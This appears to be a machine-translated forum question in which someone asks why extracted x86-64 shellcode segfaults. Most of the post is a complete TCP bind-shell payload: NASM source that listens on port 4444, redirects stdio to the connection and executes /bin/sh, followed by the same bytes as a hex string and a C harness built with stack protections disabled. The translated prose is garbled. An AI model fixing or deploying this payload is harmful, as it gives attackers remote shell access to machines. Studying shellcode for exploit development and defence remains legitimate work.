我使用的64位段錯誤,當我嘗試運行提取的shellcode即使沒有空
global _start
section .text
_start:
;Initializing the registers to make the syscalls
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
xor rax, rax
xor rdi, rdi
xor rsi, rsi
push 0x29
pop rax
push 0x2
pop rdi
inc rsi
syscall
; copying the socket descripter from rax to rdi register so that we can use it further
xchg rax, rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
; setting up the data sctructure
xor rax, rax
mov dword [rsp - 4] , eax ; we are pushing 8 zero's into the eax register
mov word [rsp - 6] ,0x5c11 ; htons value for(4444) obtained from python then encoded with hex
mov byte [rsp - 8] , 0x2 ; adding the AF_INET constant value
sub rsp , 8 ; subtracting 8 bytes so that the argument will be aligned in the top of the register
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
add al, 0x31
mov rsi, rsp
add dl, 0x10
syscall
;listen the sockets for the incomming connections
; listen(sock, MAX_CLIENTS)
; syscall number 50
cdq
push 0x32
pop rax
xor rsi, rsi
add rsi, 0x2
syscall
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
;syscall number 43
xor rax, rax
add al, 0x2b
sub rsp, 0x10
mov rsi, rsp
push 0x10
mov rdx, rsp
syscall
; storing the client socket description
mov r9, rax
; close parent
push 0x3
pop rax
syscall
xchg rdi , r9
xor rsi , rsi
dup2:
push 0x21
pop rax
syscall
inc rsi
cmp rsi , 0x2
loopne dup2
; NASM code for Execve
xor rax , rax
mov rdx , rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
; store /bin//sh address in RDI
mov rdi, rsp
; Second NULL push
push rax
; Push address of /bin//sh
push rdi
; set RSI
mov rsi, rsp
; Call the Execve syscall
push 0x3b
pop rax
syscall
寫一個TCP綁定殼牌當我嘗試運行編譯的可執行其運行正常。但是,如果我提取shell代碼並運行它的拋出分段錯誤核心轉儲。
「\ X48 \ X31 \ XC0 \ X48 \ X31 \ XFF \ X48 \ X31 \ XF6 \ X6A \ X29 \ X58 \ X6A \ X02 \ X5F \ X48 \ XFF \ XC6 \ X0F \ X05 \ X48 \ X97 \ X48 \ X31 \ XC0 \ X89 \ X44 \ X24 \ XFC \ X66 \ xc7 \ X44 \ X24 \ XFA \ X11 \ XC6 \ X44 \ X24 \ XF8 \ X02 \ X48 \ X83 \ XEC \ X08 \ X04 \ X31 \ X48 \ X89 \ XE6 \ X80 \ XC2 \ X10 \ X0F \ X05 \ X99 \ X6A \ X32 \ X58 \ X48 \ X31 \ XF6 \ X48 \ X83 \ XC6 \ X02 \ X0F \ X05 \ X48 \ X31 \ XC0 \ X04 \ X2B \ X48 \ X83 \ XEC \ X10 \ X48 \ X89 \ XE6 \ X6A \ X10 \ X48 \ X89 \ XE2 \ X0F \ X05 \ X49 \ X89 \ XC1 \ X6A \ X03 \ X58 \ X0F \ X05 \ X49 \的x87 \ xf9 \ X48 \ X31 \ XF6 \ X6A \ X21 \ X58 \ X0F \ X05 \ X48 \ XFF \ XC6 \ X48 \ X83 \ XFE \ X02 \ xe0 \ XF2 \ X48 \ X31 \ XC0 \ X48 \ X89 \ XC2 \ X50 \ X48 \ XBB \ X2F \ X62 \ X69 \ x6e \ X2F \ X73 \ X68 \ X53 \ X48 \ X89 \ XE7 \ X50 \ X57 \ X48 \ X89 \ XE6 \ X6A \ X3B \ X58 \ X0F \ X05" ;
幫助我什麼是錯在這
shellcode.c
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x6a\x29\x58\x6a\x02\x5f\x48\xff\xc6\x0f\x05\x48\x97\x48\x31\xc0\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x04\x31\x48\x89\xe6\x80\xc2\x10\x0f\x05\x99\x6a\x32\x58\x48\x31\xf6\x48\x83\xc6\x02\x0f\x05\x48\x31\xc0\x04\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
「用c運行」。怎麼樣?你寫了一個CPU模擬器嗎? C沒有設施來運行一個字符串。 – Art
是的,我用gcc編譯它-fno-stack-protector -z execstack shellcode.c -o shellcode – scorpion
顯示如何用C運行它。 –